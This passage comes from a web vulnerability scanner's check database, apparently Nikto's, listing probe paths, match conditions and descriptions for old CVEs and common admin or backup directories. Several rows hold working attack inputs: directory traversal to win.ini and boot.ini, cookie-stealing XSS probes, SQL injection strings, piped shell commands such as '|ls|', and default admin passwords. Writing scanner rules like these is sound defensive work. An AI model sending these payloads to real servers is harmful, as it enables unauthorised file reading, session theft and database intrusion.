attempted).\",\"\",\"\"\n\"001481\",\"CVE-1999-0191 http://attrition.org/security/advisory/individual/rfp/rfp.9901.nt_odbc\",\"3\",\"/scripts/tools/newdsn.exe\",\"GET\",\"CODE:200\",\"This can be used to make DSNs, useful in use with an ODBC exploit and the RDS exploit (with msadcs.dll). Also may allow files to be created on the server.\",\"\",\"\"\n\"001482\",\"OSVDB-2780\",\"7\",\"/OpenFile.aspx?file=../../../../../../../../../../Windows/win.ini\",\"GET\",\"@LFI()\",\"HTTP Commander 4.0 allows directory traversal and reading of arbitrary files.\",\"\",\"\"\n\"001483\",\"CVE-2000-0242\",\"7\",\"@CGIDIRSwindmail\",\"GET\",\"CODE:200\",\"Some versions are vulnerable. Request 'windmail?-n%20c:\\boot.ini%20you@example.com' (replace your address) and see if you get the boot.ini file\",\"\",\"\"\n\"001484\",\"CVE-2000-0242\",\"7\",\"@CGIDIRSwindmail.exe\",\"GET\",\"CODE:200\",\"Some versions are vulnerable. Request 'windmail.exe?-n%20c:\\boot.ini%20you@example.com' (replace your address) and see if you get the boot.ini file\",\"\",\"\"\n\"001485\",\"CVE-2000-0242\",\"7\",\"@CGIDIRSWINDMAIL.EXE?%20-n%20c:\\@LFI(abs,win)%\",\"GET\",\"@LFI()\",\"WINDMAIL.EXE can read arbitrary files\",\"\",\"\"\n\"001486\",\"CVE-2000-0242\",\"7\",\"@CGIDIRSWINDMAIL.EXE?%20-n%20c:\\@LFI(abs,win)20Hacker@example.com%20|%20dir%20c:\\\\\",\"GET\",\"CODE:200&&@LFI()\",\"WINDMAIL.EXE can read arbitrary files\",\"\",\"\"\n\"001487\",\"CVE-2003-1175\",\"4\",\"/index.php?vo=\\\"><script>alert(document.cookie);</script>\",\"GET\",\"BODY:><script>alert\\(document\\.cookie\\);<\\/script>\",\"Ralusp Sympoll 1.5 is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"001488\",\"https://www.exploit-db.com/exploits/23365\",\"7\",\"/.../.../.../.../.../.../.../.../.../...@LFI(nix,abs)\",\"GET\",\"@LFI()\",\"TelCondex SimpleWebserver 2.13.31027 and below allows directory traversal.\",\"\",\"\"\n\"001489\",\"https://www.exploit-db.com/exploits/23367\",\"8\",\"@CGIDIRSdose.pl?daily&somefile.txt&|ls|\",\"GET\",\"BODY:dose\\.pl&&CODE:200\",\"DailyDose 1.1 is vulnerable to a directory traversal attack in the 'list' parameter.\",\"\",\"\"\n\"001490\",\"https://seclists.org/bugtraq/2003/Apr/238\",\"4\",\"/admin/database/wwForum.mdb\",\"GET\",\"CODE:200\",\"Web Wiz Forums pre 7.5 is vulnerable to Cross-Site Scripting attacks. Default login/pass is Administrator/letmein\",\"\",\"\"\n\"001491\",\"OSVDB-2830\",\"5\",\"/../config.dat\",\"GET\",\"BODY:EnablePasswords\",\"Directory traversal and config.dat suggests NetServe web server and default admin folder. This file contains the administrative login/pass.\",\"\",\"\"\n\"001492\",\"CVE-1999-0407\",\"3\",\"/iisadmpwd/aexp2.htr\",\"GET\",\"CODE:200&&!BODY:value=\\\"\\\"\",\"Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy.\",\"\",\"\"\n\"001493\",\"CVE-1999-0407\",\"3\",\"/iisadmpwd/aexp2b.htr\",\"GET\",\"CODE:200&&!BODY:value=\\\"\\\"\",\"Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy.\",\"\",\"\"\n\"001494\",\"CVE-1999-0407\",\"3\",\"/iisadmpwd/aexp3.htr\",\"GET\",\"CODE:200&&!BODY:value=\\\"\\\"\",\"Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy.\",\"\",\"\"\n\"001495\",\"CVE-1999-0407\",\"3\",\"/iisadmpwd/aexp4.htr\",\"GET\",\"CODE:200&&!BODY:value=\\\"\\\"\",\"Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy.\",\"\",\"\"\n\"001496\",\"CVE-1999-0407\",\"3\",\"/iisadmpwd/aexp4b.htr\",\"GET\",\"CODE:200&&!BODY:value=\\\"\\\"\",\"Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy.\",\"\",\"\"\n\"001497\",\"CVE-2006-3604\",\"a\",\"//admin/aindex.htm\",\"GET\",\"CODE:200\",\"FlexWATCH firmware 2.2 is vulnerable to authentication bypass by prepending an extra /'s.\",\"\",\"\"\n\"001498\",\"OSVDB-2873\",\"a\",\"@CGIDIRSgbadmin.cgi?action=change_adminpass\",\"GET\",\"CODE:200\",\"RNN Guestbook 1.2 contains multiple vulnerabilities including remotely changing administrative password, deleting posts, changing the setup, remotely executing commands, and more. By default, the admin password is either 'admin' or 'demo'. See Nov 26, 200\",\"\",\"\"\n\"001499\",\"OSVDB-2873\",\"a\",\"@CGIDIRSgbadmin.cgi?action=change_automail\",\"GET\",\"CODE:200\",\"RNN Guestbook 1.2 contains multiple vulnerabilities including remotely changing administrative password, deleting posts, changing the setup, remotely executing commands, and more. By default, the admin password is either 'admin' or 'demo'. See Nov 26, 200\",\"\",\"\"\n\"001500\",\"OSVDB-2873\",\"a\",\"@CGIDIRSgbadmin.cgi?action=colors\",\"GET\",\"CODE:200\",\"RNN Guestbook 1.2 contains multiple vulnerabilities including remotely changing administrative password, deleting posts, changing the setup, remotely executing commands, and more. By default, the admin password is either 'admin' or 'demo'. See Nov 26, 200\",\"\",\"\"\n\"001501\",\"OSVDB-2873\",\"a\",\"@CGIDIRSgbadmin.cgi?action=setup\",\"GET\",\"CODE:200\",\"RNN Guestbook 1.2 contains multiple vulnerabilities including remotely changing administrative password, deleting posts, changing the setup, remotely executing commands, and more. By default, the admin password is either 'admin' or 'demo'. See Nov 26, 200\",\"\",\"\"\n\"001502\",\"OSVDB-2915\",\"a\",\"@CGIDIRSgbpass.pl\",\"GET\",\"CODE:200\",\"RNN Guestbook 1.2 password storage file. Administrative password should be stored in plaintext. Access gbadmin.cgi in the same directory to (ab)use. By default, the admin password is either 'admin' or 'demo'. See Nov 26, 2003 BugTraq post by brainrawt@ha\",\"\",\"\"\n\"001503\",\"https://seclists.org/bugtraq/2004/Jun/210\",\"4\",\"/shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script>\",\"GET\",\"BODY:<script>alert\\('test'\\)<\\/script>\",\"VP-ASP prior to 4.50 are vulnerable to XSS attacks\",\"\",\"\"\n\"001504\",\"https://seclists.org/bugtraq/2004/Jun/210\",\"4\",\"/shopdisplayproducts.asp?id=1&cat=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"VP-ASP Shopping Cart 4.x shopdisplayproducts.asp XSS.\",\"\",\"\"\n\"001505\",\"OSVDB-2922\",\"3\",\"/admin/wg_user-info.ml\",\"GET\",\"CODE:200\",\"WebGate Web Eye exposes user names and passwords.\",\"\",\"\"\n\"001506\",\"OSVDB-2927\",\"4\",\"/banners.php?op=EmailStats&cid=1%20AND%20passwd%20LIKE%20'a%'/*\",\"GET\",\"BODY:Statistics\\sfor\\syour\\sbanner\",\"Xoops 1.3.x, 2.0.x thru 2.0.5 are vulnerable to SQL injection in the banners.php file. Upgrade to 2.0.5.1 or higher.\",\"\",\"\"\n\"001507\",\"CVE-2000-0429\",\"a\",\"/c32web.exe/ChangeAdminPassword\",\"GET\",\"CODE:200\",\"This CGI may contain a backdoor and may allow attackers to change the Cart32 admin password.\",\"\",\"\"\n\"001508\",\"OSVDB-2944\",\"3\",\"/showmail.pl\",\"GET\",\"CODE:200\",\"@Mail WebMail 3.52 allows attacker to read arbitrary user's mailbox. Requires knowing valid user name and appending ?Folder=../../victim@somehost.com/mbox/Inbox to the showmail.pl file.\",\"\",\"\"\n\"001509\",\"OSVDB-2948\",\"9\",\"/reademail.pl\",\"GET\",\"CODE:200\",\"@Mail WebMail 3.52 contains an SQL injection that allows attacker to read any email message for any address registered in the system. Example to append to reademail.pl: ?id=666&folder=qwer'%20or%20EmailDatabase_v.Account='victim@atmail.com&print=1\",\"\",\"\"\n\"001510\",\"OSVDB-2950\",\"4\",\"/showmail.pl?Folder=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>&&!CODE:404\",\"@Mail WebMail 3.52 contains an XSS in the showmail.pl file.\",\"\",\"\"\n\"001511\",\"CVE-1999-0449\",\"6\",\"/iissamples/exair/search/query.asp\",\"GET\",\"CODE:200\",\"Scripts within the Exair package on IIS 4 can be used for a DoS against the server.\",\"\",\"\"\n\"001512\",\"CVE-2005-1598\",\"9\",\"/index.php?showforum=1&prune_day=100&sort_by=Z-A&sort_key=[sqlgoeshere]\",\"GET\",\"BODY:query error&&BODY:mySQL error\",\"Invision Power Board 2.0alpha3 and before are vulnerable to an SQL injection attack.\",\"\",\"\"\n\"001513\",\"https://www.exploit-db.com/exploits/43806\",\"9\",\"/index.php?offset=[%20Problem%20Here%20]\",\"GET\",\"BODY:error in your SQL syntax\",\"Invision Power Top Site List 1.1 contains an SQL injection vulnerability.\",\"\",\"\"\n\"001514\",\"\",\"1\",\"/buddies.blt\",\"GET\",\"CODE:200\",\"Buddy List?\",\"\",\"\"\n\"001515\",\"\",\"1\",\"/buddy.blt\",\"GET\",\"CODE:200\",\"Buddy List?\",\"\",\"\"\n\"001516\",\"\",\"1\",\"/buddylist.blt\",\"GET\",\"CODE:200\",\"Buddy List?\",\"\",\"\"\n\"001517\",\"\",\"1\",\"@CGIDIRSaddalink.cgi\",\"GET\",\"CODE:200\",\"Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web\",\"\",\"\"\n\"001518\",\"\",\"1\",\"@CGIDIRScgiecho\",\"GET\",\"CODE:200\",\"Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web\",\"\",\"\"\n\"001519\",\"\",\"1\",\"@CGIDIRScgiemail\",\"GET\",\"CODE:200\",\"Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web\",\"\",\"\"\n\"001520\",\"\",\"1\",\"@CGIDIRScountedit\",\"GET\",\"CODE:200\",\"Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web\",\"\",\"\"\n\"001521\",\"\",\"1\",\"@CGIDIRSdomainredirect.cgi\",\"GET\",\"CODE:200\",\"Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web\",\"\",\"\"\n\"001522\",\"\",\"1\",\"@CGIDIRSentropybanner.cgi\",\"GET\",\"CODE:200\",\"Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web\",\"\",\"\"\n\"001523\",\"\",\"1\",\"@CGIDIRSentropysearch.cgi?query=asdfasdf&user=root&basehref=%2F%2Fwww.yourdomain.com/\",\"GET\",\"BODY:(?:Permission denied|No matches)\",\"CPanel's Entropy Search allows username enumeration via the user parameter.\",\"\",\"\"\n\"001524\",\"\",\"1\",\"@CGIDIRSFormMail-clone.cgi\",\"GET\",\"BODY:Matt\\sWright\",\"Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web\",\"\",\"\"\n\"001525\",\"\",\"1\",\"@CGIDIRShelpdesk.cgi\",\"GET\",\"CODE:200\",\"Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web\",\"\",\"\"\n\"001526\",\"\",\"1\",\"@CGIDIRSmchat.cgi\",\"GET\",\"CODE:200\",\"Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web\",\"\",\"\"\n\"001527\",\"\",\"1\",\"@CGIDIRSrandhtml.cgi\",\"GET\",\"CODE:200\",\"Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web\",\"\",\"\"\n\"001528\",\"\",\"1\",\"@CGIDIRSrealhelpdesk.cgi\",\"GET\",\"CODE:200\",\"Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web\",\"\",\"\"\n\"001529\",\"\",\"1\",\"@CGIDIRSrealsignup.cgi\",\"GET\",\"CODE:200\",\"Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web\",\"\",\"\"\n\"001530\",\"\",\"1\",\"@CGIDIRSscgiwrap\",\"GET\",\"CODE:200\",\"Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web\",\"\",\"\"\n\"001531\",\"\",\"1\",\"@CGIDIRSsignup.cgi\",\"GET\",\"CODE:200\",\"Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web\",\"\",\"\"\n\"001532\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"12\",\"/pdf/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"001533\",\"\",\"1\",\"/sqlnet.log\",\"GET\",\"CODE:200\",\"Oracle log file found.\",\"\",\"\"\n\"001534\",\"\",\"1\",\"@CGIDIRSGW5/GWWEB.EXE\",\"GET\",\"CODE:200\",\"Groupwise web interface\",\"\",\"\"\n\"001535\",\"\",\"1\",\"/.psql_history\",\"GET\",\"BODY:(?i)(?:INSERT|DELETE|DROP|GRANT|SELECT)&&CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001536\",\"\",\"1\",\"/acceso/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001537\",\"\",\"1\",\"/access-log\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001538\",\"\",\"1\",\"/access.log\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001539\",\"\",\"1\",\"/access/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001540\",\"\",\"1\",\"/access_log\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001541\",\"\",\"1\",\"/acciones/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001542\",\"\",\"1\",\"/account/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001543\",\"\",\"1\",\"/accounting/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001544\",\"\",\"1\",\"/activex/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001545\",\"\",\"1\",\"/adm/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001546\",\"\",\"1\",\"/admin.htm\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001547\",\"\",\"1\",\"/admin.html\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001548\",\"\",\"1\",\"/admin.php\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001549\",\"\",\"1\",\"/admin.php3\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001550\",\"\",\"1\",\"/admin.shtml\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001551\",\"\",\"1\",\"/admin/\",\"GET\",\"CODE:200&&BODY:Directory Listing Denied\",\"This might be interesting.\",\"\",\"\"\n\"001552\",\"\",\"1\",\"/Administration/\",\"GET\",\"CODE:200&&BODY:Directory Listing Denied\",\"This might be interesting.\",\"\",\"\"\n\"001553\",\"\",\"1\",\"/administration/\",\"GET\",\"CODE:200&&BODY:Directory Listing Denied\",\"This might be interesting.\",\"\",\"\"\n\"001554\",\"\",\"1\",\"/administrator/\",\"GET\",\"CODE:200&&BODY:Directory Listing Denied\",\"This might be interesting.\",\"\",\"\"\n\"001555\",\"\",\"1\",\"/Admin_files/\",\"GET\",\"CODE:200&&BODY:Directory Listing Denied\",\"This might be interesting.\",\"\",\"\"\n\"001556\",\"\",\"1\",\"/advwebadmin/\",\"GET\",\"CODE:200\",\"This might be interesting: probably HostingController, www.hostingcontroller.com\",\"\",\"\"\n\"001557\",\"\",\"1\",\"/Agent/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001558\",\"\",\"1\",\"/Agentes/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001559\",\"\",\"1\",\"/agentes/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001560\",\"\",\"1\",\"/Agents/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001561\",\"\",\"1\",\"/analog/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001562\",\"\",\"1\",\"/apache/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001563\",\"\",\"1\",\"/app/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001564\",\"\",\"1\",\"/applicattion/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001565\",\"\",\"1\",\"/applicattions/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001566\",\"\",\"1\",\"/apps/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001567\",\"\",\"1\",\"/archivar/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001568\",\"\",\"1\",\"/archive/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001569\",\"\",\"1\",\"/archives/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001570\",\"\",\"1\",\"/archivo/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001571\",\"\",\"1\",\"/asp/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001572\",\"\",\"1\",\"/Asp/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001573\",\"\",\"1\",\"/atc/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001574\",\"\",\"1\",\"/auth/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001575\",\"\",\"1\",\"/awebvisit.stat\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001576\",\"\",\"1\",\"/ayuda/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001577\",\"\",\"1\",\"/backdoor/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001578\",\"\",\"1\",\"/backup/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001579\",\"\",\"1\",\"/bak/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001580\",\"\",\"1\",\"/banca/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001581\",\"\",\"1\",\"/banco/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001582\",\"\",\"1\",\"/bank/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001583\",\"\",\"1\",\"/bbv/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001584\",\"\",\"1\",\"/bdata/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001585\",\"\",\"1\",\"/bdatos/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001586\",\"\",\"1\",\"/beta/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001587\",\"\",\"1\",\"/bin/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001588\",\"\",\"1\",\"/boot/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001589\",\"\",\"1\",\"/buy/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001590\",\"\",\"1\",\"/buynow/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001591\",\"\",\"1\",\"/c/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001592\",\"\",\"1\",\"/cache-stats/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001593\",\"\",\"1\",\"/caja/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001594\",\"\",\"1\",\"/card/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001595\",\"\",\"1\",\"/cards/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001596\",\"\",\"1\",\"/cart/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001597\",\"\",\"1\",\"/cash/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001598\",\"\",\"1\",\"/ccard/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001599\",\"https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"1\",\"/ccbill/secure/ccbill.log\",\"GET\",\"CODE:200\",\"CC Bill log file. Seen in carding forums.\",\"\",\"\"\n\"001601\",\"\",\"1\",\"/cdrom/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001602\",\"\",\"1\",\"/cert/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001603\",\"\",\"1\",\"/certificado/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001604\",\"\",\"1\",\"/certificate\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001605\",\"\",\"1\",\"/certificates\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001606\",\"\",\"1\",\"/cfdocs/exampleapp/email/application.cfm\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001607\",\"\",\"1\",\"/cfdocs/exampleapp/publish/admin/addcontent.cfm\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001608\",\"\",\"1\",\"/cfdocs/exampleapp/publish/admin/application.cfm\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001609\",\"\",\"1\",\"/cfdocs/examples/httpclient/mainframeset.cfm\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001610\",\"\",\"1\",\"@CGIDIRSdbmlparser.exe\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001612\",\"\",\"1\",\"/client/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001613\",\"\",\"1\",\"/cliente/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001614\",\"\",\"1\",\"/clientes/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001615\",\"\",\"1\",\"/clients/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001617\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/code/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"001618\",\"\",\"1\",\"/communicator/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001619\",\"\",\"1\",\"/compra/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001620\",\"\",\"1\",\"/compras/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001621\",\"\",\"1\",\"/compressed/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001622\",\"\",\"1\",\"/conecta/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001623\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/config/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"001624\",\"\",\"1\",\"/config/checks.txt\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001625\",\"\",\"1\",\"/connect/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001626\",\"\",\"1e\",\"/console\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001627\",\"\",\"1\",\"/correo/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001628\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/counter/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"001629\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/credit/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"001630\",\"\",\"1\",\"/crypto/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001631\",\"\",\"1\",\"/css/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001632\",\"\",\"1\",\"/cuenta/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001633\",\"\",\"1\",\"/cuentas/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001634\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/customers/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"001635\",\"\",\"1\",\"/dan_o.dat\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001636\",\"\",\"1\",\"/dat/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001637\",\"\",\"1\",\"/data/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001638\",\"\",\"1\",\"/dato/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001639\",\"\",\"1\",\"/datos/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001640\",\"\",\"1\",\"/db/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001641\",\"\",\"1\",\"/dbase/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001642\",\"\",\"1\",\"/demo/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001643\",\"\",\"1\",\"/demos/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001644\",\"\",\"1\",\"/dev/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001645\",\"\",\"1\",\"/devel/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001646\",\"\",\"1\",\"/development/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001647\",\"\",\"1\",\"/dir/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001648\",\"\",\"1\",\"/directory/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001649\",\"\",\"1\",\"/DMR/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001650\",\"\",\"1\",\"/doc-html/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001651\",\"\",\"1\",\"/down/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001652\",\"\",\"1\",\"/download/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001653\",\"\",\"1\",\"/downloads/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001654\",\"https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"1\",\"/easylog/easylog.html\",\"GET\",\"CODE:200\",\"Seen in carding forums.\",\"\",\"\"\n\"001655\",\"\",\"1\",\"/ejemplo/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001656\",\"\",\"1\",\"/ejemplos/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001657\",\"\",\"1\",\"/employees/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001658\",\"\",\"1\",\"/envia/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001659\",\"\",\"1\",\"/enviamail/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001660\",\"\",\"1\",\"/error_log\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001662\",\"\",\"1\",\"/excel/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001663\",\"\",\"1\",\"/Excel/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001664\",\"\",\"1\",\"/EXE/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001665\",\"\",\"1\",\"/exe/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001666\",\"\",\"1\",\"/fbsd/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001667\",\"\",\"1\",\"/file/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001668\",\"\",\"1\",\"/fileadmin/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"001669\",\"\",\"1\",\"/files/\",\"GET\",\"CODE:200\",\"This might be 